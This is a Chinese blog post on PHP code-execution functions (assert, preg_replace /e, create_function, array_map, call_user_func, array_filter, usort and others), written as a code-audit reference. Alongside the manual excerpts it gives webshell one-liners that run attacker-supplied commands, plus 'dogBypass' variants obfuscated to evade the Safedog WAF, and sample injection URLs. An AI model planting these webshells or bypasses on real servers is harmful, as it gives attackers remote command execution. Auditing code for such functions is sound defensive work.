php代码审计的函数,代码审计-代码执行函数总结

最新推荐文章于 2024-03-16 14:40:50 发布
最新推荐文章于 2024-03-16 14:40:50 发布
阅读量287 收藏 4
点赞数
文章标签: php代码审计的函数

本篇涉及函数:eval()、assert()、preg_repace()、create_function()、array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()

背景:

最近研究PHP的一些危险函数,先写下代码执行函数的归纳,主要是参考自官方手册的解读,并附上了一些dogBypass的一句话,为什么是dog呢?因为在我看来dog比较适合练手,所以本篇所有bypass仅适用dog(事实是因为时间有限 没有研究其他防护软件~),其他的防护需要自行测试,大家如果有其他代码执行函数也可提出,一起讨论交流。

31ae3322196eedecb66402e22b628bbd.png

0x00 eval结构图

eval函数会将字符串作为PHP代码执行,如常见的一句话后门程序:<?php eval($_POST[cmd])?>, 属于基础内容本篇暂不讨论。

0x01 assert函数

最常用的回调函数,验证assert后面的括号里的代码是否为true的函数。如果表达式不为true,那么则会给一个warning的警告

如:<?php assert('1==2');?>

则会提醒:PHP Warning:  assert(): Assertion “1==2” failed in /usercode/file.php on line 1。

【利用示例代码】

//?cmd=phpinfo()

assert($_GET['cmd']);

?>

【dogBypass】

//cmd=phpinfo()

function cl  (){

return 'assert';

}

$a = cl();

$a($_POST['cmd']);

?>

assert_options  用于设置/获取断言的各种标志。

``````

源自官方的解释,关键点:失败回调函数。

参数:

what

标志INI 设置默认值描述

ASSERT_ACTIVEassert.active1启用 assert() 断言

ASSERT_WARNINGassert.warning1为每个失败的断言产生一个 PHP 警告(warning)

ASSERT_BAILassert.bail0在断言失败时中止执行

ASSERT_QUIET_EVALassert.quiet_eval0在断言表达式求值时禁用 error_reporting

ASSERT_CALLBACKassert.callback(NULL)断言失败时调用回调函数

断言标志

value

标志的新值。

返回值:返回任意标志的原始设置,出错时返回 FALSE。

【示例代码】

// 处理断言失败时的函数

function assert_failure()

{

echo 'Assert failed';

}

// 我们的测试函数

function test_assert($parameter)

{

assert(is_bool($parameter));

}

// 设置断言标志

assert_options(ASSERT_ACTIVE,   true);

assert_options(ASSERT_BAIL,     true);

assert_options(ASSERT_WARNING,  false);

assert_options(ASSERT_CALLBACK, 'assert_failure');

// 让一个断言会失败

test_assert(1);

// 由于 ASSERT_BAIL 是 true,这里永远也到不了

echo 'Never reached';

?>

``````

0x02 preg_replace函数 : php<=5.5

执行一个正则表达式的搜索和替换,函数在php5.5被弃用,在php7.0被移除。

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

搜索subject中匹配pattern的部分, 以replacement进行替换。

当第一个参数的正则表达式有e修正符的时候,第二个参数的字符串当做PHP代码执行。

`````

源自官方的解释;

e (PREG_REPLACE_EVAL)

Warning

This feature was DEPRECATED in PHP 5.5.0, and REMOVED as of PHP 7.0.0.

如果设置了这个被弃用的修饰符,preg_replace() 在进行了对替换字符串的后向引用替换之后, 将替换后的字符串作为php 代码评估执行(eval 函数方式),并使用执行结果 作为实际参与替换的字符串。单引号、双引号、反斜线(\)和 NULL 字符在 后向引用替换时会被用反斜线转义.

`````

【示例代码】

//?cmd=phpinfo()

echo preg_replace("/test/e",$_GET["cmd"],"jutsttest");

?>

0x03 creat_function函数

用于创建匿名函数, 使用了eval的操作存在某些安全性问题。

`````

源自官方的解释:

(PHP 4 >= 4.0.1, PHP 5, PHP 7)

create_function — Create an anonymous (lambda-style) function

语法:

string create_function ( string $args , string $code )

参数:

argsThe function arguments.

codeThe function code.

Caution :

This function internally performs an eval() and as such has the same security issues as eval().Additionally it has bad performance and memory usage characteristics.

返回值:

Returns a unique function name as a string, or FALSE on error。

``````

【用法理解】

$foo = create_function( '$x', 'return $x * 2;' );

echo $foo( 10 );

?>

相当于:

function foo ($x){

return $x *= 2;

};

echo foo( 10 );

?>

create_function的实现步骤:(参考自:http://www.laruence.com/2010/06/20/1602.html  讲解更为清晰)

1. 获取参数, 函数体

2. 拼凑一个"function __lambda_func (参数) { 函数体;} "的字符串

3. eval之

4. 通过__lambda_func在函数表中找到eval后得到的函数体, 找不到就出错

5. 定义一个函数名:"\000_lambda_" . count(anonymous_functions)++

6. 用新的函数名替换__lambda_func

7. 返回新的函数名

问题一:未对要传入create_function中的代码做清理,执行的code拼接了可控变量的数据,导致可以将evil代码传入并被执行。【场景:直接写入恶意代码】

详细介绍:https://www.t00ls.net/viewthread.php?tid=20774

国文参考:http://lovexm.blog.51cto.com/3567383/1743442

外文参考:https://ttmm.io/tech/php-security-lambdas/

利用示例代码 &【dogBypass】

//post:name1=Thinking&name2=JoeVatte;}phpinfo();/*

$name1 = $_POST['name1'];

$name2 = $_POST['name2'];

$str = 'return'.$name1." & ".$name2.';';

echo $str.'
';

$newfunc = create_function('$name1',$str);

问题二: 用于函数函数回调,个人理解就是create_function内部会使用eval,将传入的字符串进行eval得到函数体,在执行该函数。【场景:找到相应函数所在位置,审查是否有可以利用的地方】有疑问:如何函数回调的例子。

``````

源自官方的解释:

Using anonymous functions as callback functions

$av = array("the ", "a ", "that ", "this ");

array_walk($av, create_function('&$v,$k', '$v = $v . "mango";'));

print_r($av);

?>

以上例程会输出:

Array

(

[0] => the mango

[1] => a mango

[2] => that mango

[3] => this mango

)

``````

示例代码,例子不好没想到怎么构造:

function evil($evil)

{

echo $evil.':test | ';

}

$av = array("the ", "a ", "that ", "this ");

array_walk($av, create_function('&$v,$k', 'evil($v);'));

print_r($av);

?>

0x04 array_map函数

`````

源自官方的解释:

(PHP 4 >= 4.0.6, PHP 5, PHP 7)

array_map — 为数组的每个元素应用回调函数

说明:

array array_map ( callable $callback , array $array1 [, array $... ] )

array_map():返回数组,是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量,两者必须一样。

参数:

callback

回调函数,应用到每个数组里的每个元素。

array1

数组,遍历运行 callback 函数。

...

数组列表,每个都遍历运行 callback 函数。

返回值:

返回数组,包含 callback 函数处理之后 array1 的所有元素。

Example #1 array_map() 例子

function cube($n)

{

return($n * $n * $n);

}

$a = array(1, 2, 3, 4, 5);

$b = array_map("cube", $a);

print_r($b);

?>

这使得 $b 成为:

Array

(

[0] => 1

[1] => 8

[2] => 27

[3] => 64

[4] => 125

)

``````

【利用示例代码】

//post:func=system&cmd=whoami

$bad_func=$_POST['func'];

$bad_cmd=$_POST['cmd'];

$bad_array[0]=$bad_cmd;

$new_array=array_map($bad_func,$bad_array);

//print_r($new_array);

?>

【dogBypass】

//post:func=system&cmd=whoami

$bad_func=$_POST['func'];

$bad_cmd=$_POST['cmd'];

$bad_array[0]=$bad_cmd;

$func_evil=trim(' a r ra y_ma p  ');

$func_evil =str_replace(" ", "", $func_evil);

$new_array=$func_evil($bad_func,$bad_array);

//print_r($new_array);

?>

0x05 call_user_func函数

`````

源自官方的解释:

call_user_func

(PHP 4, PHP 5, PHP 7)

call_user_func — 把第一个参数作为回调函数调用, 后续参数作为回调函数的参数传入。

说明:

mixed call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] )

第一个参数 callback 是被调用的回调函数,其余参数是回调函数的参数。

参数:

callback

将被调用的回调函数(callable)。

parameter

0个或以上的参数,被传入回调函数。

返回值:

返回回调函数的返回值。

call_user_func() 的例子

function barber($type)

{

echo "You wanted a $type haircut, no problem\n";

}

call_user_func('barber', "mushroom");

call_user_func('barber', "shave");

?>

以上例程会输出:

You wanted a mushroom haircut, no problem

You wanted a shave haircut, no problem

`````

利用示例代码 &【dogBypass】

//func=system&cmd=whoami

$bad_func=$_POST['func'];

$bad_cmd=$_POST['cmd'];

call_user_func($bad_func,$bad_cmd);

?>

0x06  call_user_func_array函数

``````

源自官方的解释:

call_user_func_array

(PHP 4 >= 4.0.4, PHP 5, PHP 7)

call_user_func_array — 调用回调函数,并把一个数组参数作为回调函数的参数

说明:

mixed call_user_func_array ( callable $callback , array $param_arr )

把第一个参数作为回调函数(callback)调用,把参数数组作(param_arr)为回调函数的的参数传入。

参数:

callback

被调用的回调函数。

param_arr

要被传入回调函数的数组,这个数组得是索引数组。

返回值:

返回回调函数的结果。如果出错的话就返回FALSE

Example #1 call_user_func_array()例子

function foobar($arg, $arg2) {

echo __FUNCTION__, " got $arg and $arg2\n";

}

class foo {

function bar($arg, $arg2) {

echo __METHOD__, " got $arg and $arg2\n";

}

}

// Call the foobar() function with 2 arguments

call_user_func_array("foobar", array("one", "two"));

// Call the $foo->bar() method with 2 arguments

$foo = new foo;

call_user_func_array(array($foo, "bar"), array("three", "four"));

?>

以上例程的输出类似于:

foobar got one and two

foo::bar got three and four

`````

利用示例代码 &【dogBypass】

//func=system&cmd=whoami

$bad_func=$_POST['func'];

$bad_array[0]=$_POST['cmd'];

call_user_func_array($bad_func,$bad_array);

?>

0x07 array_filter函数

``````

源自官方的解释:

array_filter

(PHP 4 >= 4.0.6, PHP 5, PHP 7)

array_filter — 用回调函数过滤数组中的单元

说明:

array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。

参数:

array

要循环的数组

callback

使用的回调函数

如果没有提供 callback 函数, 将删除 array 中所有等值为 FALSE 的条目。更多信息见转换为布尔值。

flag

决定callback接收的参数形式:

•ARRAY_FILTER_USE_KEY - callback接受键名作为的唯一参数

•ARRAY_FILTER_USE_BOTH - callback同时接受键名和键值

返回值:

返回过滤后的数组。

Example #1 array_filter() 例子

function odd($var)

{

// returns whether the input integer is odd

return($var & 1);

}

function even($var)

{

// returns whether the input integer is even

return(!($var & 1));

}

$array1 = array("a"=>1, "b"=>2, "c"=>3, "d"=>4, "e"=>5);

$array2 = array(6, 7, 8, 9, 10, 11, 12);

echo "Odd :\n";

print_r(array_filter($array1, "odd"));

echo "Even:\n";

print_r(array_filter($array2, "even"));

?>

以上例程会输出:

Odd :

Array

(

[a] => 1

[c] => 3

[e] => 5

)

Even:

Array

(

[0] => 6

[2] => 8

[4] => 10

[6] => 12

)

``````

利用代码示例&【dogBypass】

//func=system&cmd=whoami

$cmd =$_POST['cmd'];

$func =$_POST['func'];

$array1 =array($cmd);

$evil = trim('a r ra y_fi lt er');

$evil = str_replace(" ", "", $evil);

$evil($array1, $func);

?>

0x08 usort函数

`````

源自官方的解释:

(PHP 4, PHP 5, PHP 7)

usort — 使用用户自定义的比较函数对数组中的值进行排序

说明:

bool usort ( array &$array , callable $value_compare_func )

本函数将用用户自定义的比较函数对一个数组中的值进行排序。 如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数。

Note:

If two members compare as equal, their relative order in the sorted array is undefined.

Note: 此函数为 array 中的元素赋与新的键名。这将删除原有的键名,而不是仅仅将键名重新排序。

参数

array

输入的数组

cmp_function

在第一个参数小于,等于或大于第二个参数时,该比较函数必须相应地返回一个小于,等于或大于 0 的整数。

int callback ( mixed $a, mixed $b )

Caution

Returning non-integer values from the comparison function, such as float, will result in an internal cast to integer of the callback's return value. So values such as 0.99 and 0.1 will both be cast to an integer value of 0, which will compare such values as equal.

返回值

成功时返回 TRUE, 或者在失败时返回 FALSE。

``````

利用代码示例:

源自 am0s师傅的博客:http://www.am0s.com/functions/97.html

php>=5.6

GET: [['$a=0','eval($_POST["x"])'],'assert'];

http://www.url.com/t.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert

php>=<5.6

http://www.url.com/test.php?1=1+1&2=eval($_POST[x])

这里am0s师傅利用到了PHP5.6的一个特性:

f423544aae520afa39db2ed4979b7957.png

利用代码示例&【dogBypass】

$cmd =$_POST['cmd'];

$func =$_POST['func'];

$array1 =array(1,$cmd);

$a =  usort($array1, $func);

?>

0x09 uasort函数

``````

(PHP 4, PHP 5, PHP 7)

uasort — 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联

说明:

bool uasort ( array &$array , callable $value_compare_func )

本函数对数组排序并保持索引和单元之间的关联。

主要用于对那些单元顺序很重要的结合数组进行排序。比较函数是用户自定义的。

Note:

If two members compare as equal, their relative order in the sorted array is undefined.

参数:

array

输入的数组。

value_compare_func

用户自定义比较函数的例子请参考 usort() 和 uksort()。

返回值:

成功时返回 TRUE, 或者在失败时返回 FALSE。

Example #1 uasort() 的基本例子

// Comparison function

function cmp($a, $b) {

if ($a == $b) {

return 0;

}

return ($a < $b) ? -1 : 1;

}

// Array to be sorted

$array = array('a' => 4, 'b' => 8, 'c' => -1, 'd' => -9, 'e' => 2, 'f' => 5, 'g' => 3, 'h' => -4);

print_r($array);

// Sort and print the resulting array

uasort($array, 'cmp');

print_r($array);

?>

以上例程会输出:

Array

(

[a] => 4

[b] => 8

[c] => -1

[d] => -9

[e] => 2

[f] => 5

[g] => 3

[h] => -4

)

Array

(

[d] => -9

[h] => -4

[c] => -1

[e] => 2

[g] => 3

[a] => 4

[f] => 5

[b] => 8

)

``````

利用代码 示例& 【dogBypass】

$cmd =$_POST['cmd'];

$func =$_POST['func'];

$array1 =array(1,$cmd);

$a =  uasort($array1, $func);

?>

总结:

希望本篇可以帮助大家在代码审计中理清楚需要重点关注的危险函数,当然大伙如果有其他代码执行函数也可提出,一起讨论交流,后续会逐步补充些新发现的代码执行函数以及实际的代码审计案例,顺带说下有些时候dogBypass 并没有想象中那么复杂 :)

快乐的羔羊
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码审计课程3-常见危险函数和特殊函数
北冥有鱼
07-20 348
内容介绍 包含函数 命令执行函数 文件操作函数 特殊函数
php代码审计-代码执行.pdf
12-14
代码审计PHP 代码执行机制中的一种安全机制,用于检查代码的安全性。代码审计可以检查代码中是否存在安全漏洞,例如 eval() 函数、assert() 函数、preg_replace() 函数等。 例如,我们可以使用以下方式来检查...
php代码审计函数
qq_42375801的博客
07-21 196
$GLOBALS — 引用全局作用域中可用的全部变量 $_SERVER — 服务器和执行环境信息 $_GET  — HTTPGET 变量 $_POST  — HTTPPOST 变量 $_FILES  — HTTP 文件上传变量 $_REQUEST  — HTTPRequest 变量 $_SESSION — Session 变量 $_ENV — 环境变量 $_COOKIE — HTT...
php代码审计代码执行函数(4)
D1stiny的博客
05-10 313
文章目录eval代码执行注入assert 代码执行注入preg_replace正则代码执行注入pattern第一个参数replacement第二个参数preg_replace()第三个参数 在php里面有一些函数将输入的字符串参数当作PHP程序代码执行 常见代码执行函数:eval 、assert 、preg_replace eval代码执行注入 test.php如下 <?php if(isset($_GET['rayi'])){ $rayi=$_GET['rayi']; eval("\$rayi =
PHP代码审计常用函数
xiaoka__的博客
08-13 219
1.empty: 检测变量是否为空 2.is null: 检测变量是否为NULL 3 is int is long is double is float is real is numeric:检测变量是否为数字或数字字符串 is bool:检测是否是布尔型 4.isset:检测变量是否已设置并且非 NULL 5.strval:获取变量的字符串值 intval:获取变量的整数值 boolval:获取变量的布尔值 6.unset:释放变量的值 7.password_get_info 返回指定散列
PHP代码审计敏感函数合集
weixin_54882883的博客
08-26 893
通常代码审计的话,大部分就是通过关键的函数,和关键的变量去审计。通常去代码审计的时候基本是正则的挖掘思路。
[GFCTF202021]Baby-Web只有代码审计部分
01-02
在这个特定的题目中,我们看到涉及到了多个PHP函数的使用,这些函数在实际的代码审计过程中是常见的检查点。 1. `strpos` 函数用于查找字符串中特定字符或子串首次出现的位置。例如,`strpos('abcdef', 'c')` 将...
php代码审计之命令注入(3)
01-09
文章目录system()命令:exec():passthru(...这个函数会将结果直接进行输出,命令成功后返回输出的最后一行,失败 返回FALSE system.php源码如下: <?php $action = $_GET['cmd']; echo ;
Seay源代码审计系统(AWD必备)
07-09
Seay源代码审计系统 这是一款基于C#语言开发的一款针对PHP代码安全性审计的系统,主要运行于Windows系统上。这款软件能够发现SQL注入、代码执行、命令执行、文件包含、文件上传、绕过转义防护、拒绝服务、XSS跨站、...
WEB代码审计与渗透测试.ppt
11-12
WEB代码审计的本质是找对应变量与函数,变量跟踪的过程可以分为两步: 1. 通过变量找函数:从变量的值开始,跟踪变量的处理过程,直到找到对应的函数。 2. 通过函数找变量:从函数开始,跟踪函数的处理过程,直到...
PHP代码审计代码审计中常见的函数
ssrf
03-23 584
目录0x001 配置文件0x002 文件读取函数0x003 文件上传函数0x004 打印函数0x005 文件包含0x006 命令执行0x007 代码执行0x008 SQL注入0x009 变量覆盖0x010 逻辑漏洞0x011 特殊点 0x001 配置文件 config.php cache.config.php 0x002 文件读取函数 file_get_contents()、highlight_file()、fopen()、readfile()、fread()、fgetss()、fgets()、par
PHP代码审计2—相关函数介绍
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
06-24 1034
PHP 代码审计常见的函数
PHP代码审计函数分析
Williamanddog的博客
08-29 202
PHP extract() 函数从数组中把变量导⼊到当前的符号表中。对于数组中的每个元素,键名⽤于变量名,键值⽤于变量值。经过 extract() 函数后,会⾃动解析所有参数,并按照对应 key=value 的⽅式进⾏赋值,因此,当我们输⼊代码中预定义好的变量名时,变量的值会被覆盖。在上例中,将LLY参数进⾏重新赋值,由于找不到对应⽂件,所以 $content 变量为空,student变量不给他赋值,那么这时就可以满⾜其中的 if ($student == $content) 条件。
php代码审计函数,php代码审计中的重要函数总结 | CN-SEC 中文网
weixin_30646295的博客
03-28 92
摘要escapeshellarg 以上由Styxz整理SQL注入magic_quotes_gpcaddslashesmysql_real_escape_stringintvalXSSprintprint_rechoprintfsprintf’dievar_dumpvar_export文件包含includeinclude_oncerequirerequire_once文件读取file_get_c...
PHP代码审计-PHP危险函数及特殊函数
forget_mt的博客
02-20 952
PHP代码审计-PHP危险函数及特殊函数
PHP + 代码审计函数详解
最新发布
人若无名,便可专心练剑
03-16 1138
函数有几个对应的关键点:function关键字、函数名、参数(形参和实参)、函数体和返回值。
php代码审计之危险函数
小小猪的博客
12-25 875
php代码审计之危险函数 php代码执行的危险函数: call_user_func() 第一个参数 callback 是被调用的回调函数,其余参数是回调函数的参数。 传入call_user_func()的参数不能为引用传递 call_user_func($_GET['1'],$_GET['2']); 构造:codeexec.php?1=assert&2=phpinfo() call_user_func_array() 第一个参数作为回调函数(callback)调用,把参数数组作(pa
PHP代码审计——PHP中常见的敏感函数列表
qq_44029310的博客
10-03 2590
PHP中常见的敏感函数列表。
PHP trick(代码审计关注点)
3569
03-29 660
https://hacksec.xyz/2018/03/23/php-trick/?nsukey=cWDNgiIxMsJayPNWtqM8Rc9amSOIgC0SI9Ko3jxxW2uV9mcoLNLdl4Q1U%2BrV9UhKIs3das0Cizzc8atumDKxG5nHSDPPthMpgeq5Xqa02MDie21AnddLn9BUUyOdXVEOsbvHRrlq1S61OS4%2BRpR...
WEB代码审计和渗透测试讲义.ppt
12-18
WEB代码审计和渗透测试讲义.ppt

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值